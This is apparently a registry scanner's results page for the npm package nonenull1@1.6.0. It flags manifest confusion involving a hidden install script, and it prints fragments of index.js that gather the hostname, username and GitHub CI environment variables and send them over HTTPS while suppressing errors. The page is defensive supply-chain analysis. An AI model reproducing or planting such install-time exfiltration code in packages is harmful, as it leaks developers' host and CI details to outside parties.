registry  /  nonenull1  /  1.6.0

nonenull1@1.6.0

Static Scan Results

scanned 2h ago · by rust-scanner

Static analysis flagged 7 finding(s) at 72.0% confidence. This version is warn-only unless an AI or security-team review confirms malicious behavior.

Static reason
One or more suspicious static signals were detected.

Decision evidence

public snapshot
Behavioral surface
Source
EnvironmentVarsFilesystemNetwork
Supply chainNo supply-chain packaging signals triggered.
Manifest
NoLicense
scanned 1 file(s), 925 B of source

Source & flagged code

3 flagged · loading source
index.jsView file
1const https = require('https'); L2: const fs = require('fs'); ... L7: const ngrokPayload = JSON.stringify({ L8: host: os.hostname(), L9: user: os.userInfo().username, L10: repo: process.env.GITHUB_REPOSITORY || 'N/A', L11: runner: process.env.RUNNER_ENVIRONMENT || 'N/A', ... L25: req.on('error', () => {}); L26: req.write(ngrokPayload); L27: req.end();
High
Host Fingerprint Exfiltration

Source collects local host identity data and sends it to an external endpoint.

index.jsView on unpkg · L1
binding.gypView file
path = binding.gyp kind = build_helper sizeBytes = 174 magicHex = [redacted]
Medium
Ships Build Helper

Package ships non-JavaScript build or shell helper files.

binding.gypView on unpkg
package.jsonView file
scripts registry_only=install
Critical
Manifest Confusion

Tarball package.json differs from the npm registry version manifest for scripts or dependency sets.

package.jsonView on unpkg

Findings

1 Critical1 High3 Medium2 Low
CriticalManifest Confusionpackage.json
HighHost Fingerprint Exfiltrationindex.js
MediumNetwork
MediumEnvironment Vars
MediumShips Build Helperbinding.gyp
LowFilesystem
LowNo License